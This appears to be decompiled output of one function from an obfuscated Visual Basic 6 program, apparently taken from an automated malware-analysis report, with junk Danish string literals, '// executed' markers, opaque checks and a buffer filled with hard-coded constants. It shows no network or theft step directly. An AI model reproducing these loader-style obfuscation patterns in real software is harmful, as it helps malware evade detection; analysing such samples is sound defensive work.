				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t1065);
				_push(2);
				_push(0x4029b0);
				_push( &_v76);
				L0040186A();
				_v272 = L"Hjortens";
				_v280 = 8;
				L0040184C();
				_push( &_v184);
				_push( &_v200);
				L00401852();
				_push( &_v200);
				_t658 =  &_v144;
				_push(_t658);
				L00401858();
				_push(_t658);
				L0040185E();
				_v208 = _t658;
				_v216 = 8;
				_t659 =  &_v216;
				_push(_t659);
				L00401864();
				asm("sbb eax, eax");
				_v380 =  ~( ~_t659 + 1);
				_t932 =  &_v144;
				L00401846();
				_push( &_v216);
				_push( &_v200);
				_push( &_v184);
				_push(3);
				L00401840();
				_t1069 = _t1068 + 0x10;
				if(_v380 != 0) {
					_push(L"7:7:7");
					__eax =  &_v184;
					_push( &_v184); // executed
					L0040182E(); // executed
					__eax =  &_v184;
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
					_v272 = L"Readjust";
					_v280 = 8;
					L0040184C();
					__eax =  &_v184;
					_push( &_v184);
					__eax =  &_v200;
					_push( &_v200);
					L0040181C();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v144;
					L00401858();
					_push(L"CANNIBALEAN");
					_push(L"Bursati");
					_push(L"multivalent"); // executed
					L00401822(); // executed
					L00401846();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v184;
					_push( &_v184);
					_push(2);
					L00401840();
					__esp = __esp + 0xc;
				}
				_push( &_v184);
				L0040180A();
				_push( &_v184);
				_t1082 =  *0x401258;
				_push(_t932);
				_push(_t932);
				_v92 = _t1082;
				_push(0x402520);
				_push( &_v200);
				L00401810();
				_v272 = 0xfffffff9;
				_v280 = 0x8002;
				_push( &_v200);
				_t671 =  &_v280;
				_push(_t671);
				L00401816();
				_v380 = _t671;
				_push( &_v200);
				_push( &_v184);
				_push(2);
				L00401840();
				_t1070 = _t1069 + 0xc;
				if(_v380 != 0) {
					_v176 = 1;
					_v184 = 2;
					_push(0);
					_push( &_v184);
					L00401804();
					L0040183A();
					L00401828();
					_push( &_v184);
					L004017FE();
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
				}
				_v272 = L"replicr";
				_v280 = 8;
				L0040184C();
				_t675 =  &_v184;
				_push(_t675);
				L004017F8();
				_v380 =  ~(0 | _t675 - 0x0000ffff <= 0x00000000);
				L00401828();
				_t676 = _v380;
				if(_t676 != 0) {
					 *_v64 = 0x579;
					 *((short*)(_v64 + 2)) = 0x23c6;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t882 =  &_v184;
					_push(_t882);
					L004017F2();
					_t989 = 2;
					 *((short*)(_v64 + (_t989 << 1))) = _t882;
					L00401828();
					_t883 = 2;
					 *((short*)(_v64 + _t883 * 3)) = 0x3c46;
					_t885 = 2;
					 *((short*)(_v64 + (_t885 << 2))) = 0x2b65;
					_t887 = 2;
					 *((short*)(_v64 + _t887 * 5)) = 0x4c1;
					_t889 = 2;
					 *((short*)(_v64 + _t889 * 6)) = 0x1d9a;
					_v272 = 0x40253c;
					_v280 = 8;
					L0040184C();
					_t891 =  &_v184;
					_push(_t891);
					_push(0x10);
					L004017DA();
					L0040183A();
					_push(_t891);
					L004017E0();
					_v192 = _t891;
					_v200 = 3;
					_t892 =  &_v200;
					_push(_t892);
					L004017E6();
					L0040183A();
					_push(_t892);
					L004017EC();
					_t999 = 2;
					 *((short*)(_v64 + _t999 * 7)) = _t892;
					_push( &_v148);
					_push( &_v144);
					_push(2);
					L004017D4();
					_push( &_v200);
					_push( &_v184);
					_push(2);
					L00401840();
					_t1070 = _t1070 + 0x18;
					_t897 = 2;
					 *((short*)(_v64 + (_t897 << 3))) = 0xfe2;
					_t899 = 2;
					 *((short*)(_v64 + _t899 * 9)) = 0x2b08;
					_t901 = 2;
					 *((short*)(_v64 + _t901 * 0xa)) = 0x5426;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t903 =  &_v184;
					_push(_t903);
					L004017F2();
					_t1004 = 2;
					 *((short*)(_v64 + _t1004 * 0xb)) = _t903;
					L00401828();
					_t904 = 2;
					 *((short*)(_v64 + _t904 * 0xc)) = 0x368d;
					_t906 = 2;
					 *((short*)(_v64 + _t906 * 0xd)) = 0x142;
					_t908 = 2;
					_t909 = _t908 * 0xe;
					 *((short*)(_v64 + _t909)) = 0x34bb;
					_push(L"OFFENTLIGHEDSSFRE");
					L004017EC();
					_t1010 = 2;
					 *(_v64 + _t1010 * 0xf) = _t909;
					_t910 = 2;
					 *((short*)(_v64 + (_t910 << 4))) = 0x45bc;
					_t912 = 2;
					 *((short*)(_v64 + _t912 * 0x11)) = 0x530e;
					_t914 = 2;
					_t915 = _t914 * 0x12;
					 *((short*)(_v64 + _t915)) = 0x6a6e;
					_push(L"Dagvagten");
					L004017EC();
					_t1015 = 2;
					 *(_v64 + _t1015 * 0x13) = _t915;
					if( *0x4223c0 != 0) {
						_v436 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v436 = 0x4223c0;
					}
					_v380 =  *_v436;
					_t921 =  *((intOrPtr*)( *_v380 + 0x14))(_v380,  &_v168);
					asm("fclex");
					_v384 = _t921;
					if(_v384 >= 0) {
						_v440 = _v440 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v380);
						_push(_v384);
						L004017C8();
						_v440 = _t921;
					}
					_v388 = _v168;
					_t926 =  *((intOrPtr*)( *_v388 + 0x70))(_v388,  &_v332);
					asm("fclex");
					_v392 = _t926;
					if(_v392 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4025b0);
						_push(_v388);
						_push(_v392);
						L004017C8();
						_v444 = _t926;
					}
					_t676 = _v332;
					_v104 = _t676;
					L004017C2();
				}
				L004017BC();
				L0040183A();
				L004017BC();
				L0040183A();
				_v404 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v148, 0x790eaf, 0x4849, 0x51ac, _t676, L"tilskrersaksene");
				L004017D4();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t685 =  &_v184;
				L004017F2();
				_v344 = _t685;
				_v336 = 0x6988;
				L004017B6();
				_v348 = 0x10e914;
				_v332 = _v344;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v332,  &_v348, 0x2f8e,  &_v144,  &_v336,  &_v340, _t685, 3,  &_v144,  &_v148,  &_v152);
				_t695 = _v340;
				_v52 = _t695;
				L00401846();
				L00401828();
				_v348 = 0x40f600;
				L004017B0();
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v348, _t695, L"Forretningsbrevet5");
				L00401846();
				L004017B6();
				_t704 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x17c6,  &_v144,  &_v148);
				_v380 = _t704;
				if(_v380 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v448 = _t704;
				}
				_v408 = _v148;
				_v148 = _v148 & 0x00000000;
				L0040183A();
				L00401846();
				L004017AA();
				_v368 = _t1082;
				_v176 = _v368;
				_v184 = 4;
				_push( &_v200);
				_t707 =  &_v184;
				_push(_t707);
				L004017A4();
				_v380 = _t707;
				if(_v380 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v452 = _t707;
				}
				L00401792();
				_t708 =  &_v168;
				L00401798();
				_v384 = _t708;
				_t712 =  *((intOrPtr*)( *_v384 + 0x1c))(_v384,  &_v348, _t708, _t707);
				asm("fclex");
				_v388 = _t712;
				if(_v388 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402650);
					_push(_v384);
					_push(_v388);
					L004017C8();
					_v456 = _t712;
				}
				_v364 = 0xed488;
				_v360 = 0x711cb2;
				_t713 =  &_v200;
				L0040178C();
				_v356 = _t713;
				_v352 = 0x23dec;
				_t720 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v352, 0x3e2bce,  &_v356, _v348,  &_v360,  &_v364, _t713);
				_v392 = _t720;
				if(_v392 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402344);
					_push(_a4);
					_push(_v392);
					L004017C8();
					_v460 = _t720;
				}
				L004017C2();
				_t722 =  &_v184;
				L00401840();
				L00401786();
				L0040183A();
				L004017EC();
				_v340 = _t722;
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t723 =  &_v184;
				L004017F2();
				_v344 = _t723;
				L00401780();
				_v348 = _t723;
				_v336 = _v344;
				_v332 = _v340;
				_t731 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v332, L"blaarv", 0x35a58,  &_v336,  &_v348, _t723, _t722, 0x9b, 2, _t722,  &_v200);
				_v380 = _t731;
				if(_v380 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v464 = _t731;
				}
				L00401846();
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t732 =  &_v184;
				L004017F2();
				_v336 = _t732;
				_v332 = _v336;
				_t737 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v332, L"Lersernes", _t732);
				_v380 = _t737;
				if(_v380 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v468 = _t737;
				}
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t738 =  &_v184;
				_push(_t738);
				L004017F2();
				_v336 = _t738;
				_v192 =  *0x40124c;
				_v200 = 4;
				_push(0);
				_push( &_v200);
				_push( &_v216);
				L0040177A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t741 =  &_v232;
				_push(_t741);
				L004017F2();
				_v340 = _t741;
				_t1086 =  *0x401248;
				_v240 = _t1086;
				_v248 = 4;
				_push( &_v264);
				_t743 =  &_v248;
				_push(_t743);
				L004017A4();
				_v380 = _t743;
				if(_v380 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v472 = _t743;
				}
				_v332 = _v340;
				_v352 = 0x1eaaee;
				_t745 =  &_v216;
				L0040178C();
				_v348 = _t745;
				_t747 =  &_v264;
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v336,  &_v348,  &_v352, L"Snoreskrternes8",  &_v332, L"tril", _t747, _t747,  &_v356, _t745);
				_v136 = _v356;
				L00401840();
				L00401774();
				_v376 = _t1086;
				L0040185E();
				L0040183A();
				_t761 = _v156;
				_v412 = _t761;
				_v156 = _v156 & 0x00000000;
				L0040176E();
				_v348 = _t761;
				L004017B6();
				_t762 =  &_v152;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v144,  &_v348, _t762, L"Benefact6", _t762, L"RODTEGNENES", L"eudaemonistical", 6,  &_v184,  &_v200,  &_v232,  &_v248,  &_v216,  &_v264);
				_v416 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				_t771 =  &_v144;
				L004017D4();
				L004017EC();
				_v336 = _t771;
				_v176 = 0x1ca534;
				_v184 = 3;
				_t772 =  &_v184;
				L004017E6();
				L0040183A();
				L00401768();
				_v352 = _t772;
				_v332 = _v336;
				_v348 = 0x761fa7;
				_t776 =  &_v332;
				L00401762();
				_t780 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v348, _t776, L"Whiskysourens1", _t776,  &_v352,  &_v144, _t772, L"ADMIRINGLY", 3, _t771,  &_v148,  &_v156);
				_v380 = _t780;
				if(_v380 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v476 = _t780;
				}
				L00401846();
				L00401828();
				L004017EC();
				_v340 = _t780;
				_v332 = 0x640;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v340,  &_v332,  &_v336, L"Kainsmrkernes3");
				_v132 = _v336;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v332);
				_v84 = _v332;
				_v336 = 0x393d;
				_v332 = 0x67ff;
				L004017B6();
				_t797 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Odontoma7", L"undrede",  &_v144, 0x2745,  &_v332, 0x239fb0,  &_v336);
				_v380 = _t797;
				if(_v380 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v480 = _t797;
				}
				L00401846();
				_v352 = 0x419a61;
				_v348 = 0x5ea767;
				_t802 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"Utrecht8",  &_v348, 0x5f1f,  &_v352);
				_v380 = _t802;
				if(_v380 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v484 = _t802;
				}
				_v272 = 0x402844;
				_v280 = 8;
				L0040184C();
				L0040175C();
				L00401834();
				L0040183A();
				L004017B6();
				_v336 = 0x54f7;
				_v332 = 0x147e;
				_t808 =  &_v144;
				L00401762();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v332, 0x5c23,  &_v336, _t808, L"Udstillingslokalet", _t808,  &_v148, 0xfffc6,  &_v348,  &_v200,  &_v200, 0x65,  &_v184);
				_v44 = _v348;
				L004017D4();
				L00401840();
				_v176 = 0xfffffff6;
				_v184 = 2;
				_t819 =  &_v184;
				L00401804();
				L0040183A();
				L00401762();
				_t822 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0xf03, _t819, _t819, _t819, 0, 2,  &_v184,  &_v200, 2,  &_v144,  &_v148);
				_v380 = _t822;
				if(_v380 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v488 = _t822;
				}
				L00401846();
				L00401828();
				L004017E0();
				_v348 = _t822;
				_t827 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v348, 0x472f27, 0x451752,  &_v352, L"Generalisations7");
				_v380 = _t827;
				if(_v380 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v492 = _t827;
				}
				_v100 = _v352;
				L00401756();
				L0040183A();
				L00401750();
				L0040183A();
				_v420 = _v164;
				_v164 = _v164 & 0x00000000;
				L0040183A();
				_v424 = _v160;
				_v160 = _v160 & 0x00000000;
				L004017B6();
				_t832 =  &_v152;
				L0040183A();
				_t836 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v144, _t832, _t832, L"SOLITRSKAKKEN", L"Indvi2", L"Fdres",  &_v156, L"STRUTTENDE", 0x17, 0x67);
				_v380 = _t836;
				if(_v380 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x402344);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v496 = _t836;
				}
				_v428 = _v156;
				_v156 = _v156 & 0x00000000;
				L0040183A();
				_push( &_v164);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_t842 =  &_v144;
				_push(_t842);
				_push(5);
				L004017D4();
				asm("fabs");
				_v176 =  *0x401238;
				asm("fnstsw ax");
				if((_t842 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v184 = 5;
				_push( &_v200);
				_t845 =  &_v184;
				_push(_t845);
				L004017A4();
				_v380 = _t845;
				if(_v380 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v500 = _t845;
				}
				L0040182E();
				_t848 =  &_v144;
				L00401858();
				L004017BC();
				L0040183A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t849 =  &_v232;
				L004017F2();
				_v340 = _t849;
				_v332 = _v340;
				_v432 = _v152;
				_v152 = _v152 & 0x00000000;
				_t853 =  &_v332;
				L0040183A();
				_t854 =  &_v200;
				L0040178C();
				_t857 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, _t854, _t854, _t853, _t853, 0x3d78c1,  &_v336, _t849, _t848, _t848,  &_v216,  &_v216, L"16:16:16");
				_v384 = _t857;
				if(_v384 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x402344);
					_push(_a4);
					_push(_v384);
					L004017C8();
					_v504 = _t857;
				}
				_v92 = _v336;
				L004017D4();
				_t865 =  &_v184;
				L00401840();
				L004017EC();
				_v336 = _t865;
				L004017EC();
				_v340 = _t865;
				L004017B6();
				_v332 = 0x2885;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, _v336, L"SELVFINANSIEREDES",  &_v332, _v340,  &_v144, 0x5929, 0x40294c, 0x402904, 4, _t865,  &_v216,  &_v232,  &_v200, 3,  &_v144,  &_v148,  &_v152);
				L00401846();
				E0042129F();
				_v272 = 2;
				_v280 = 2;
				L0040174A();
				_v272 = 0x806dac;
				_v280 = 3;
				L0040174A();
				_t874 =  &_v184;
				L00401744();
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, _t874, _t874, _t874,  &_v40,  &_v128);
				_v8 = 0;
				asm("wait");
				_push(0x41d878);
				L00401828();
				L00401846();
				_v348 =  &_v76;
				_t879 =  &_v348;
				_push(_t879);
				_push(0);
				L0040173E();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t879;
			}






































































































































































      0x0041c1e7
      0x0041c1f6
      0x0041c202
      0x0041c20a
      0x0041c20d
      0x0041c21a
      0x0041c223
      0x0041c22e
      0x0041c231
      0x0041c233
      0x0041c23b
      0x0041c23c
      0x0041c241
      0x0041c24b
      0x0041c261
      0x0041c26c
      0x0041c273
      0x0041c274
      0x0041c27f
      0x0041c280
      0x0041c286
      0x0041c287
      0x0041c28c
      0x0041c28d
      0x0041c292
      0x0041c298
      0x0041c2a2
      0x0041c2a8
      0x0041c2a9
      0x0041c2b1
      0x0041c2b6
      0x0041c2bd
      0x0041c2c3
      0x0041c2ce
      0x0041c2d5
      0x0041c2dc
      0x0041c2dd
      0x0041c2df
      0x0041c2e4
      0x0041c2f0
      0x0041c2f6
      0x0041c2fb
      0x0041c301
      0x0041c302
      0x0041c307
      0x0041c30d
      0x0041c30e
      0x0041c318
      0x0041c323
      0x0041c328
      0x0041c332
      0x0041c348
      0x0041c34d
      0x0041c353
      0x0041c354
      0x0041c35a
      0x0041c35b
      0x0041c360
      0x0041c366
      0x0041c367
      0x0041c36e
      0x0041c374
      0x0041c379
      0x0041c37e
      0x0041c383
      0x0041c38e
      0x0041c393
      0x0041c399
      0x0041c39a
      0x0041c3a0
      0x0041c3a1
      0x0041c3a3
      0x0041c3a8
      0x0041c3a8
      0x0041c3b1
      0x0041c3b2
      0x0041c3bd
      0x0041c3be
      0x0041c3c4
      0x0041c3c5
      0x0041c3c6
      0x0041c3c9
      0x0041c3d4
      0x0041c3d5
      0x0041c3da
      0x0041c3e4
      0x0041c3f4
      0x0041c3f5
      0x0041c3fb
      0x0041c3fc
      0x0041c401
      0x0041c40e
      0x0041c415
      0x0041c416
      0x0041c418
      0x0041c41d
      0x0041c429
      0x0041c42b
      0x0041c435
      0x0041c43f
      0x0041c447
      0x0041c448
      0x0041c452
      0x0041c45d
      0x0041c468
      0x0041c469
      0x0041c474
      0x0041c475
      0x0041c47f
      0x0041c48a
      0x0041c48a
      0x0041c48f
      0x0041c499
      0x0041c4af
      0x0041c4b4
      0x0041c4ba
      0x0041c4bb
      0x0041c4cb
      0x0041c4d8
      0x0041c4dd
      0x0041c4e6
      0x0041c4ef
      0x0041c4f7
      0x0041c4fd
      0x0041c507
      0x0041c511
      0x0041c517
      0x0041c518
      0x0041c51f
      0x0041c525
      0x0041c52f
      0x0041c536
      0x0041c53d
      0x0041c545
      0x0041c54c
      0x0041c554
      0x0041c55b
      0x0041c563
      0x0041c56a
      0x0041c570
      0x0041c57a
      0x0041c590
      0x0041c595
      0x0041c59b
      0x0041c59c
      0x0041c59e
      0x0041c5ab
      0x0041c5b0
      0x0041c5b1
      0x0041c5b6
      0x0041c5bc
      0x0041c5c6
      0x0041c5cc
      0x0041c5cd
      0x0041c5da
      0x0041c5df
      0x0041c5e0
      0x0041c5e7
      0x0041c5ee
      0x0041c5f8
      0x0041c5ff
      0x0041c600
      0x0041c602
      0x0041c610
      0x0041c617
      0x0041c618
      0x0041c61a
      0x0041c61f
      0x0041c624
      0x0041c62b
      0x0041c633
      0x0041c63a
      0x0041c642
      0x0041c649
      0x0041c64f
      0x0041c659
      0x0041c663
      0x0041c669
      0x0041c66a
      0x0041c671
      0x0041c678
      0x0041c682
      0x0041c689
      0x0041c690
      0x0041c698
      0x0041c69f
      0x0041c6a7
      0x0041c6a8
      0x0041c6ae
      0x0041c6b4
      0x0041c6b9
      0x0041c6c0
      0x0041c6c7
      0x0041c6cd
      0x0041c6d4
      0x0041c6dc
      0x0041c6e3
      0x0041c6eb
      0x0041c6ec
      0x0041c6f2
      0x0041c6f8
      0x0041c6fd
      0x0041c704
      0x0041c70b
      0x0041c716
      0x0041c733
      0x0041c718
      0x0041c718
      0x0041c71d
      0x0041c722
      0x0041c727
      0x0041c727
      0x0041c745
      0x0041c760
      0x0041c763
      0x0041c765
      0x0041c772
      0x0041c794
      0x0041c774
      0x0041c774
      0x0041c776
      0x0041c77b
      0x0041c781
      0x0041c787
      0x0041c78c
      0x0041c78c
      0x0041c7a1
      0x0041c7bc
      0x0041c7bf
      0x0041c7c1
      0x0041c7ce
      0x0041c7f0
      0x0041c7d0
      0x0041c7d0
      0x0041c7d2
      0x0041c7d7
      0x0041c7dd
      0x0041c7e3
      0x0041c7e8
      0x0041c7e8
      0x0041c7f7
      0x0041c7fe
      0x0041c808
      0x0041c808
      0x0041c812
      0x0041c81f
      0x0041c825
      0x0041c832
      0x0041c83d
      0x0041c843
      0x0041c856
      0x0041c879
      0x0041c896
      0x0041c89e
      0x0041c8a8
      0x0041c8b2
      0x0041c8b9
      0x0041c8be
      0x0041c8c5
      0x0041c8d9
      0x0041c8de
      0x0041c8ef
      0x0041c926
      0x0041c92c
      0x0041c933
      0x0041c93d
      0x0041c948
      0x0041c94d
      0x0041c95c
      0x0041c969
      0x0041c97e
      0x0041c98a
      0x0041c99a
      0x0041c9ba
      0x0041c9c0
      0x0041c9cd
      0x0041c9ef
      0x0041c9cf
      0x0041c9cf
      0x0041c9d4
      0x0041c9d9
      0x0041c9dc
      0x0041c9e2
      0x0041c9e7
      0x0041c9e7
      0x0041c9fc
      0x0041ca02
      0x0041ca12
      0x0041ca1d
      0x0041ca22
      0x0041ca27
      0x0041ca33
      0x0041ca39
      0x0041ca49
      0x0041ca4a
      0x0041ca50
      0x0041ca51
      0x0041ca56
      0x0041ca63
      0x0041ca78
      0x0041ca65
      0x0041ca65
      0x0041ca6b
      0x0041ca70
      0x0041ca70
      0x0041ca7f
      0x0041ca85
      0x0041ca8c
      0x0041ca91
      0x0041caac
      0x0041caaf
      0x0041cab1
      0x0041cabe
      0x0041cae0
      0x0041cac0
      0x0041cac0
      0x0041cac2
      0x0041cac7
      0x0041cacd
      0x0041cad3
      0x0041cad8
      0x0041cad8
      0x0041cae7
      0x0041caf1
      0x0041cafb
      0x0041cb02
      0x0041cb07
      0x0041cb0d
      0x0041cb46
      0x0041cb4c
      0x0041cb59
      0x0041cb7b
      0x0041cb5b
      0x0041cb5b
      0x0041cb60
      0x0041cb65
      0x0041cb68
      0x0041cb6e
      0x0041cb73
      0x0041cb73
      0x0041cb88
      0x0041cb94
      0x0041cb9d
      0x0041cbaa
      0x0041cbb7
      0x0041cbbd
      0x0041cbc2
      0x0041cbc9
      0x0041cbd3
      0x0041cbdd
      0x0041cbe4
      0x0041cbe9
      0x0041cbf6
      0x0041cbfb
      0x0041cc08
      0x0041cc16
      0x0041cc44
      0x0041cc4a
      0x0041cc57
      0x0041cc79
      0x0041cc59
      0x0041cc59
      0x0041cc5e
      0x0041cc63
      0x0041cc66
      0x0041cc6c
      0x0041cc71
      0x0041cc71
      0x0041cc86
      0x0041cc91
      0x0041cc96
      0x0041cca0
      0x0041ccaa
      0x0041ccb1
      0x0041ccb6
      0x0041ccc4
      0x0041ccdf
      0x0041cce5
      0x0041ccf2
      0x0041cd14
      0x0041ccf4
      0x0041ccf4
      0x0041ccf9
      0x0041ccfe
      0x0041cd01
      0x0041cd07
      0x0041cd0c
      0x0041cd0c
      0x0041cd21
      0x0041cd26
      0x0041cd30
      0x0041cd3a
      0x0041cd40
      0x0041cd41
      0x0041cd46
      0x0041cd53
      0x0041cd59
      0x0041cd63
      0x0041cd6b
      0x0041cd72
      0x0041cd73
      0x0041cd78
      0x0041cd82
      0x0041cd8c
      0x0041cd92
      0x0041cd93
      0x0041cd98
      0x0041cd9f
      0x0041cda5
      0x0041cdab
      0x0041cdbb
      0x0041cdbc
      0x0041cdc2
      0x0041cdc3
      0x0041cdc8
      0x0041cdd5
      0x0041cdea
      0x0041cdd7
      0x0041cdd7
      0x0041cddd
      0x0041cde2
      0x0041cde2
      0x0041cdf8
      0x0041cdff
      0x0041ce09
      0x0041ce10
      0x0041ce15
      0x0041ce22
      0x0041ce29
      0x0041ce5c
      0x0041ce68
      0x0041ce9a
      0x0041cea7
      0x0041ceac
      0x0041ceb7
      0x0041cec4
      0x0041cec9
      0x0041cecf
      0x0041ced5
      0x0041cee2
      0x0041cee7
      0x0041cef8
      0x0041cefd
      0x0041cf15
      0x0041cf31
      0x0041cf3d
      0x0041cf43
      0x0041cf56
      0x0041cf69
      0x0041cf72
      0x0041cf7f
      0x0041cf84
      0x0041cf8b
      0x0041cf95
      0x0041cf9f
      0x0041cfa6
      0x0041cfb3
      0x0041cfbe
      0x0041cfc3
      0x0041cfd0
      0x0041cfd7
      0x0041cfef
      0x0041cffb
      0x0041d010
      0x0041d016
      0x0041d023
      0x0041d045
      0x0041d025
      0x0041d025
      0x0041d02a
      0x0041d02f
      0x0041d032
      0x0041d038
      0x0041d03d
      0x0041d03d
      0x0041d052
      0x0041d05d
      0x0041d067
      0x0041d06c
      0x0041d073
      0x0041d098
      0x0041d0a5
      0x0041d0b8
      0x0041d0c5
      0x0041d0c9
      0x0041d0d2
      0x0041d0e6
      0x0041d11c
      0x0041d122
      0x0041d12f
      0x0041d151
      0x0041d131
      0x0041d131
      0x0041d136
      0x0041d13b
      0x0041d13e
      0x0041d144
      0x0041d149
      0x0041d149
      0x0041d15e
      0x0041d163
      0x0041d16d
      0x0041d197
      0x0041d19d
      0x0041d1aa
      0x0041d1cc
      0x0041d1ac
      0x0041d1ac
      0x0041d1b1
      0x0041d1b6
      0x0041d1b9
      0x0041d1bf
      0x0041d1c4
      0x0041d1c4
      0x0041d1d3
      0x0041d1dd
      0x0041d1f3
      0x0041d208
      0x0041d214
      0x0041d221
      0x0041d231
      0x0041d236
      0x0041d23f
      0x0041d25b
      0x0041d267
      0x0041d288
      0x0041d294
      0x0041d2a7
      0x0041d2bf
      0x0041d2c7
      0x0041d2d1
      0x0041d2dd
      0x0041d2e4
      0x0041d2f1
      0x0041d2f7
      0x0041d30a
      0x0041d310
      0x0041d31d
      0x0041d33f
      0x0041d31f
      0x0041d31f
      0x0041d324
      0x0041d329
      0x0041d32c
      0x0041d332
      0x0041d337
      0x0041d337
      0x0041d34c
      0x0041d357
      0x0041d361
      0x0041d366
      0x0041d38c
      0x0041d392
      0x0041d39f
      0x0041d3c1
      0x0041d3a1
      0x0041d3a1
      0x0041d3a6
      0x0041d3ab
      0x0041d3ae
      0x0041d3b4
      0x0041d3b9
      0x0041d3b9
      0x0041d3ce
      0x0041d3d3
      0x0041d3e0
      0x0041d3ec
      0x0041d3f9
      0x0041d404
      0x0041d40a
      0x0041d41d
      0x0041d428
      0x0041d42e
      0x0041d440
      0x0041d45b
      0x0041d46e
      0x0041d483
      0x0041d489
      0x0041d496
      0x0041d4b8
      0x0041d498
      0x0041d498
      0x0041d49d
      0x0041d4a2
      0x0041d4a5
      0x0041d4ab
      0x0041d4b0
      0x0041d4b0
      0x0041d4c5
      0x0041d4cb
      0x0041d4db
      0x0041d4e6
      0x0041d4ed
      0x0041d4f4
      0x0041d4fb
      0x0041d4fc
      0x0041d502
      0x0041d503
      0x0041d505
      0x0041d513
      0x0041d515
      0x0041d51b
      0x0041d51f
      0x0040154c
      0x0040154c
      0x0041d525
      0x0041d535
      0x0041d536
      0x0041d53c
      0x0041d53d
      0x0041d542
      0x0041d54f
      0x0041d564
      0x0041d551
      0x0041d551
      0x0041d557
      0x0041d55c
      0x0041d55c
      0x0041d577
      0x0041d583
      0x0041d58a
      0x0041d590
      0x0041d59d
      0x0041d5a2
      0x0041d5ac
      0x0041d5b6
      0x0041d5bd
      0x0041d5c2
      0x0041d5d0
      0x0041d5dd
      0x0041d5e3
      0x0041d5f6
      0x0041d609
      0x0041d60f
      0x0041d616
      0x0041d624
      0x0041d62a
      0x0041d637
      0x0041d659
      0x0041d639
      0x0041d639
      0x0041d63e
      0x0041d643
      0x0041d646
      0x0041d64c
      0x0041d651
      0x0041d651
      0x0041d667
      0x0041d682
      0x0041d69f
      0x0041d6a8
      0x0041d6b5
      0x0041d6ba
      0x0041d6c6
      0x0041d6cb
      0x0041d6dd
      0x0041d6e2
      0x0041d717
